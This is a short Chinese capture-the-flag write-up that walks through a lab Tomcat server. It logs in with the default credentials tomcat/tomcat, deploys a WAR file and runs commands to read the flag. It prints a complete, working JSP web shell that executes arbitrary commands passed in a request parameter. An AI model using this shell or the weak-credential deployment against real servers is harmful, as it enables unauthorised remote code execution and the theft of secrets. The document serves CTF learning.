弱密码+getshell
访问http://node3.buuoj.cn:25141/manager/html
弱密码 tomcat tomcat
在这个后台,我们可以操作每个应用的状态……以及读取每个应用下的Session。
但是这都不是最大的安全隐患
制作war包。
war包:Java web工程,都是打成war包,进行发布,如果我们的服务器选择TOMCAT等轻量级服务器,一般就打出WAR包进行发布
准备好jsp一句话木马,在安装好JDK环境,执行:jar -cvf [war包名称].war 打包目录
也可以将jsp压缩为zip,再将zip后缀改名为war,然后上传war包
现在已经打包好了一个WAR包。
找到Tomcat管理页面中的WAR file to deploy进行上传部署了。
应用列表已经出现了我们的目录
访问http://node3.buuoj.cn:25141/test/1.jsp
jsp一句话木马
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
1.jsp?pwd=023&i=ls
env打印环境变量
拿到flag!